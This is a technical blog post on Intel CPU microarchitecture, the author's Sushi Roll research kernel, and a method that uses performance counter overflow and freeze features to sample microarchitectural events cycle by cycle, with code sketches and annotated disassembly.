Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.

Microcode

Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.

uop Cache

There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.

Allocation Queue

The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.


Execution engine

The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.

Things start to get a bit complex at this point, click for details!

Renaming / Allocating / Retirement

Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.

There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like xor with self, or and with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.

Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.

Re-ordering

uOP re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction can execute while the current one is still waiting on its results.

For example:

mov rax, [rax]
add rbx, rcx

In this short example we see that we perform a 64-bit load from the address in rax and store the result back into rax. Memory operations can be quite expensive, ranging from 4 cycles for an L1 cache hit, to 250 cycles and beyond for an off-processor memory access.

The processor is able to realize that the add rbx, rcx instruction does not need to “wait” for the result of the load, and can send off the add uop for execution while waiting for the load to complete.

This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.

For example:

Core 0 executes the following:

mov [shared_memory.pointer], rax ; Store the pointer in `rax` to shared memory
mov [shared_memory.owned],   0   ; Mark that we no longer own the shared memory

Core 1 executes the following:

.try_again:
    cmp [shared_memory.owned], 0 ; Check if someone owns this memory
    jne .try_again               ; Someone owns this memory, wait a bit longer

    mov rax, [shared_memory.pointer] ; Get the pointer
    mov rax, [rax]                   ; Read from the pointer

On x86 this is safe, as all aligned loads and stores are atomic, and are committed in a way that makes them appear in order to all other processors. On something like ARM the owned value could be written prior to the pointer being written, allowing core 1 to use a stale/invalid pointer.
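
As an aside, here’s a minimal Rust sketch (the types and names are purely illustrative) of how the same hand-off could be expressed portably: on x86 the release store and acquire load compile down to ordinary moves, while on a weakly-ordered architecture they emit the barriers needed to avoid the stale-pointer problem described above.

use std::sync::atomic::{AtomicBool, AtomicPtr, Ordering};

// Shared state: a pointer plus a flag saying whether core 0 still owns it.
struct Shared {
    pointer: AtomicPtr<u64>,
    owned:   AtomicBool,
}

// Core 0: publish the pointer, then give up ownership.
fn core0(shared: &Shared, data: *mut u64) {
    shared.pointer.store(data, Ordering::Relaxed);
    // Release ordering guarantees the pointer store is visible before the
    // flag is cleared, even on weakly-ordered hardware.
    shared.owned.store(false, Ordering::Release);
}

// Core 1: wait until ownership is released, then read through the pointer.
fn core1(shared: &Shared) -> u64 {
    // Acquire ordering pairs with the release store above, so we can never
    // observe the cleared flag while still seeing a stale pointer value.
    while shared.owned.load(Ordering::Acquire) {}
    let ptr = shared.pointer.load(Ordering::Relaxed);
    unsafe { *ptr }
}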

Execution Units

Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.

For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.


Memory subsystem

The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.

Caches

Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second (roughly 2.2 billion cycles per second divided by the 150+ cycle latency of each memory access). That’s as slow as an Intel 80486 from 1991.

When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.

For x86 there are typically 3 levels of cache: A level 1 cache, which is extremely fast, but small: 4 cycles latency. Followed by a level 2 cache, which is much larger, but still quite small: 14 cycles latency. Finally there’s the last-level-cache (LLC, typically the L3 cache), this is quite large, but has a higher latency: ~60 cycles.

The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.

Translation Lookaside Buffers (TLBs)

In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.
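
To make the cost concrete, here’s a small sketch (standard x86-64 4-level paging with 4 KiB pages) of how a virtual address is split into the four table indices the hardware walker has to resolve on a TLB miss; each index selects one of 512 entries, and each level is another memory access.

/// Split a canonical x86-64 virtual address into its 4-level paging indices.
fn page_walk_indices(vaddr: u64) -> (u64, u64, u64, u64, u64) {
    let pml4 = (vaddr >> 39) & 0x1ff; // Page Map Level 4 index
    let pdpt = (vaddr >> 30) & 0x1ff; // Page Directory Pointer Table index
    let pd   = (vaddr >> 21) & 0x1ff; // Page Directory index
    let pt   = (vaddr >> 12) & 0x1ff; // Page Table index
    let off  = vaddr & 0xfff;         // Offset within the 4 KiB page
    (pml4, pdpt, pd, pt, off)
}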

It is up to the OS to tell the CPU when to flush these TLBs via the invalidate-page (invlpg) instruction. If the OS doesn’t correctly invlpg memory when mappings change, it’s possible to use stale translation information.

Line fill buffers

While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.

Store buffer

Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.

Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.

Load buffers

Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.

CPU architecture summary and more info

That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. Intel Manuals, WikiChip, Agner Fog’s CPU documentation, and many more, provide a more thorough documentation of Intel micro-architecture.


Sushi Roll

Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.

Kernel mascot: Squishable Sushi Roll

A primer on Knights Landing

Sushi Roll was originally designed for my Vectorized Emulation work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86 and standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.

On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.

Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (lock inc instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.

Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!

The original intent of Sushi Roll

Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory however, is allowed, as this doesn’t cause cache coherency traffic.

This design also meant that a lock never needed to be held, even atomic-level locks using the lock prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.

While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard send()/recv() model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.

No interrupts, no timers, no software threads, no processes

Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems, as to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).

By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.

Soft Reboots

Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.

Sushi Roll conclusion

Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.


Performance Counters

Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel System Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).

Performance Counter Manual

Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.

These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters is reported in CPUID.0AH:EAX[7:0]. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.

Basic usage of performance counters

To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.

For example, here’s a very small selection of Skylake-specific performance events:

Skylake Events

Intel performance counters largely rely on two banks of MSRs. The performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above. And the performance counter MSRs which hold the counts themselves.

The performance event selection MSRs (IA32_PERFEVTSELx) start at address 0x186 and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading CPUID.0AH:EAX[15:8]. The performance counter MSRs (IA32_PMCx) start at address 0xc1 and also span a contiguous MSR region. The counters have a micro-architecture-specific number of bits they support, found in CPUID.0AH:EAX[23:16]. Reading and writing these MSRs is done via the rdmsr and wrmsr instructions respectively.

Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (0x186, 0x187, 0x188, and 0x189) and 4 counter MSRs (0xc1, 0xc2, 0xc3, and 0xc4). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!
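
As a rough sketch of that dynamic detection (using Rust’s stable __cpuid intrinsic; a freestanding kernel might issue the cpuid instruction itself instead):

/// Query CPUID leaf 0x0A for architectural performance monitoring info:
/// (PMC version, number of programmable counters, counter width in bits).
fn pmc_capabilities() -> (u8, u8, u8) {
    let info = unsafe { core::arch::x86_64::__cpuid(0x0a) };
    let version      = (info.eax & 0xff) as u8;          // CPUID.0AH:EAX[7:0]
    let num_counters = ((info.eax >> 8) & 0xff) as u8;   // CPUID.0AH:EAX[15:8]
    let counter_bits = ((info.eax >> 16) & 0xff) as u8;  // CPUID.0AH:EAX[23:16]
    (version, num_counters, counter_bits)
}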

Here’s what the IA32_PERFEVTSELx MSR looks like for PMC version 3:

Performance Event Selection

Event Select: Holds the event number from the event tables, for the event you are interested in
Unit Mask: Holds the umask value from the event tables, for the event you are interested in
USR: If set, this counter counts during user-land code execution (ring level != 0)
OS: If set, this counter counts during OS execution (ring level == 0)
E: If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events
PC: Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU
INT: Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter
ANY: Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread
EN: Enable the counter
INV: Invert the counter mask, which changes the meaning of the CMASK field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)
CMASK: If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if INV is set) CMASK times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event

And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the IA32_PERFEVTSELx registers with the correct event number and umask, set the USR and/or OS bits depending on what type of code you want to track, and set the EN bit to enable it! Now the corresponding IA32_PMCx counter will be incrementing every time that event occurs!
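
For a concrete sense of what that programming looks like, here’s a sketch that builds the event select value and writes it with a hypothetical wrmsr helper. The MSR addresses are the ones listed above; the bit positions follow the Intel SDM layout of the fields in the table.

const IA32_PERFEVTSEL0: u32 = 0x186; // First event select MSR
const IA32_PMC0:        u32 = 0x0c1; // First programmable counter MSR

/// Hypothetical kernel primitive wrapping the `wrmsr` instruction.
unsafe fn wrmsr(_msr: u32, _value: u64) { unimplemented!() }

/// Program PMC0 to count `event`/`umask` in both user and kernel mode.
unsafe fn program_pmc0(event: u64, umask: u64) {
    let sel = (event & 0xff)         // Event Select [7:0]
        | (umask & 0xff) << 8        // Unit Mask    [15:8]
        | (1 << 16)                  // USR: count when ring level != 0
        | (1 << 17)                  // OS:  count when ring level == 0
        | (1 << 22);                 // EN:  enable the counter
    wrmsr(IA32_PMC0, 0);             // Clear the current count
    wrmsr(IA32_PERFEVTSEL0, sel);    // Program and enable the event
}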

Reading the PMC counts faster

Instead of performing a rdmsr instruction to read the IA32_PMCx values, instead a rdpmc instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if ecx[31] is set to 1. This is typically how you’d read the performance counters.
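
A sketch of such a read using current Rust inline assembly syntax (purely illustrative; a kernel from this era would use whatever asm facility it has):

/// Read performance counter `counter` via `rdpmc`. Setting bit 31 of the
/// index selects the "fast read mode", which returns only the low 32 bits.
unsafe fn rdpmc(counter: u32) -> u64 {
    let lo: u32;
    let hi: u32;
    core::arch::asm!(
        "rdpmc",
        in("ecx") counter,   // Counter index (optionally with bit 31 set)
        out("eax") lo,       // Low 32 bits of the counter
        out("edx") hi,       // High bits of the counter
        options(nostack, preserves_flags),
    );
    ((hi as u64) << 32) | (lo as u64)
}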

Performance Counters version 2

In the second version of performance counters, Intel added a bunch of new features.

Intel added some fixed performance counters (IA32_FIXED_CTR0 through IA32_FIXED_CTR2, starting at address 0x309) which are not programmable. These are configured by IA32_FIXED_CTR_CTRL at address 0x38d. Unlike normal PMCs, these cannot be programmed to count any event. Rather, the controls for these only allow selecting which CPU ring level they increment at (or none to disable them), and whether or not they trigger an interrupt on overflow. No other control is provided for these.

IA32_FIXED_CTR0 (MSR 0x309): Counts the number of retired instructions
IA32_FIXED_CTR1 (MSR 0x30a): Counts the number of core cycles while the processor is not halted
IA32_FIXED_CTR2 (MSR 0x30b): Counts the number of timestamp counts (TSC) while the processor is not halted

These are then enabled and disabled by:

Fixed Counter Control

The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are IA32_PERF_GLOBAL_CTRL (address 0x38f), which allows enabling and disabling performance counters in bulk; IA32_PERF_GLOBAL_STATUS (address 0x38e), which allows checking the overflow status of all performance counters in one rdmsr; and IA32_PERF_GLOBAL_OVF_CTRL (address 0x390), which allows resetting the overflow status of all performance counters in one wrmsr. Since rdmsr and wrmsr are serializing instructions, these can be quite expensive, and being able to reduce the number of them is important!

Global control (simple, allows masking of individual counters from one MSR):

Performance Global Control

Status (tracks overflows of various counters, with a global condition changed tracker):

Performance Global Status

Status control (writing a 1 to any of these bits clears the corresponding bit in IA32_PERF_GLOBAL_STATUS):

Performance Global Status
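
To tie the global control layout to the listings shown later in this post: per the Intel SDM layout, bits [3:0] of IA32_PERF_GLOBAL_CTRL gate the four programmable counters and bits [34:32] gate the three fixed counters, which is where the 0x2_0000_000f value used in the test harness comes from. A small sketch:

const IA32_PERF_GLOBAL_CTRL: u32 = 0x38f;

/// Value enabling PMC0-PMC3 plus fixed counter #1 (un-halted core cycles).
fn global_ctrl_pmcs_and_fixed1() -> u64 {
    let pmcs   = 0xfu64;     // Bits 0-3: programmable counters 0-3
    let fixed1 = 1u64 << 33; // Bit 33: IA32_FIXED_CTR1
    pmcs | fixed1            // = 0x2_0000_000f
}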

Finally, Intel added 2 bits to the existing IA32_DEBUGCTL MSR (address 0x1d9). These 2 bits Freeze_LBR_On_PMI (bit 11) and Freeze_PerfMon_On_PMI (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.

Performance Counters version 3

Performance counters version 3 was pretty simple. Intel added the ANY bit to IA32_PERFEVTSELx and IA32_FIXED_CTR_CTRL to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed set of 2 counters to a variable number of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.

Performance Global Status

Performance Counters version 4

Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example IA32_PERF_GLOBAL_OVF_CTRL became IA32_PERF_GLOBAL_STATUS_RESET). Intel also added a new MSR IA32_PERF_GLOBAL_STATUS_SET (address 0x391) which instead of clearing the bits in IA32_PERF_GLOBAL_STATUS, allows for setting of the bits.

Further, the freezing behavior enabled by IA32_DEBUGCTL.Freeze_LBR_On_PMI and IA32_DEBUGCTL.Freeze_PerfMon_On_PMI was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the IA32_PERF_GLOBAL_CTRL MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.

Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.

Conclusion

Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)


Cycle-by-cycle micro-architectural sampling

Now that we’ve gotten some prerequisites out of the way, lets talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!

It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!

The Goal

Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often applied to a block of code or a whole program, and viewed as a single data point over the entire run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when the misses occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.

More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.

The Idea

We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.

We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a wrmsr instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.

But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the IA32_DEBUGCTL.Freeze_PerfMon_On_PMI feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in IA32_PERF_GLOBAL_STATUS is set (version 4 PMCs specific feature), causing all performance counters to stop.

This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time and the event we’re interested in at the same time. Doing this isn’t too difficult either, we can simply pre-program the performance counter value IA32_PMCx to N away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory if we program PMC0 to count number of cycles, set the counter to 2^48 - N where N is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters after N cycles.

If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting N to sample the code at a different cycle count.

This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.

So… lets try it!

The Implementation

A simple pseudo-code implementation of this sampling method looks as such:

/// Number of times we want to sample each data point. This allows us to look
/// for the minimum, maximum, and average values. This also gives us a way to
/// verify that the environment we're in is deterministic and the results are
/// sane. If minimum == maximum over many samples, it's safe to say we have a
/// very clear picture of what is happening.
const NUM_SAMPLES: u64 = 1000;

/// Maximum number of cycles to sample on the x-axis. This limits the sampling
/// space.
const MAX_CYCLES: u64 = 1000;

// Program the APIC to map the performance counter overflow interrupts to a
// stub assembly routine which simply `iret`s out
configure_pmc_interrupts_in_apic();

// Configure performance counters to freeze on interrupts
perf_freeze_on_overflow();

// Iterate through each performance counter we want to gather data on
for perf_counter in performance_counters_of_interest {
    // Disable and reset all performance counters individually
    // Clearing their counts to 0, and clearing their event select MSRs to 0
    disable_all_perf_counters();

    // Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL
    // to 0
    disable_perf_globally();

    // Enable a performance counter (lets say PMC0) to track the `perf_counter`
    // we're interested in. Note that this doesn't start the counter yet, as we
    // still have the counters globally disabled.
    enable_perf_counter(perf_counter);

    // Go through each number of samples we want to collect for this performance
    // counter... for each cycle offset.
    for _ in 0..NUM_SAMPLES {
        // Go through each cycle we want to observe
        for cycle_offset in 1..=MAX_CYCLES {
            // Clear out the performance counter values: IA32_PMCx fields
            clear_perf_counters();

            // Program fixed counter #1 (un-halted cycle counter) to trigger
            // an interrupt on overflow. This will cause an interrupt, which
            // will then cause a freeze of all PMCs.
            program_fixed1_interrupt_on_overflow();

            // Program the fixed counter #1 (un-halted cycle counter) to
            // `cycles` prior to overflowing
            set_fixed1_value((1 << 48) - cycle_offset);

            // Do some pre-test environment setup. This is important to make
            // sure we can sample the code under test multiple times and get
            // the same result. Here is where you'd be flushing cache lines,
            // maybe doing a `wbinvd`, etc.
            set_up_environment();

            // Enable both the fixed #1 cycle counter and the PMC0 performance
            // counter (tracking the stat we're interested in) at the same time,
            // by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't
            // have to worry about re-ordering across this boundary.
            enable_perf_globally();

            asm!(r#"

                asm
                under
                test
                here

            "# :::: "volatile");

            // Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters
            disable_perf_globally();

            // If fixed PMC #1 has not overflowed, then we didn't capture
            // relevant data. This only can happen if we tried to sample a
            // cycle which happens after the assembly under test executed.
            if fixed1_pmc_overflowed() == false {
                continue;
            }

            // At this point we can do whatever we want as the performance
            // counters have been turned off by the interrupt and we should have
            // relevant data in both :)

            // Get the count from fixed #1 PMC. It's important that we grab this
            // as interrupts are not deterministic, and thus it's possible we
            // "overshoot" the target
            let fixed1_count = read_fixed1_counter();

            // Add the distance-from-overflow we initially programmed into the
            // fixed #1 counter, with the current value of the fixed #1 counter
            // to get the total number of cycles which have elapsed during
            // our example.
            let total_cycles = cycle_offset + fixed1_count;

            // Read the actual count from the performance counter we were using.
            // In this case we were using PMC #0 to track our event of interest.
            let value = read_pmc0();

            // Somehow log that performance counter `perf_counter` had a value
            // `value` `total_cycles` into execution
            log_result(perf_counter, value, total_cycles);
        }
    }
}

Simple results

So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:

add rsp, 8
sub rsp, 8
add rsp, 8
sub rsp, 8

Simple Sample

So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).

So does this look right? Hmmm…. we ran 4 instructions, why did we see 8 retire?

Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f ; IA32_PERF_GLOBAL_CTRL
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

; Here's our code under test :D
00000011  4883C408          add rsp,byte +0x8
00000015  4883EC08          sub rsp,byte +0x8
00000019  4883C408          add rsp,byte +0x8
0000001D  4883EC08          sub rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000021  B98F030000        mov ecx,0x38f
00000026  31C0              xor eax,eax
00000028  31D2              xor edx,edx
0000002A  0F30              wrmsr

So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the wrmsr we used to enable the counters. This makes sense, at some point prior to retirement of the wrmsr instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!

Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our add and sub mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.

These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 mov, and 2 xor instructions which retire prior to the wrmsr which disables the counters. It makes sense that we never see the final wrmsr retire as the counters will be turned off in the CPU prior to the wrmsr instruction retiring!

Voilà! It all makes sense. We now have a great view into what the CPU did in terms of retirement for this code in question. Everything we saw lined up with what actually executed, always good to see.

A bit more advanced result

Lets add a few more performance counters to track. In this case lets track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during test.

Code to test (just a few writes to the stack):

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  4883EC08          sub rsp,byte +0x8
00000015  48C7042400000000  mov qword [rsp],0x0
0000001D  4883C408          add rsp,byte +0x8
00000021  4883EC08          sub rsp,byte +0x8
00000025  48C7042400000000  mov qword [rsp],0x0
0000002D  4883C408          add rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000031  B98F030000        mov ecx,0x38f
00000036  31C0              xor eax,eax
00000038  31D2              xor edx,edx
0000003A  0F30              wrmsr

Store Sample

This one is fun. We simply make room on the stack (sub rsp), write a 0 to the stack (mov [rsp]), and then restore the stack (add rsp), and then do it all again one more time.

Here we added another plot to the graph, Port 4, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first wrmsr enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.

This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!

How deep can we go?

Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.

Busy Sample

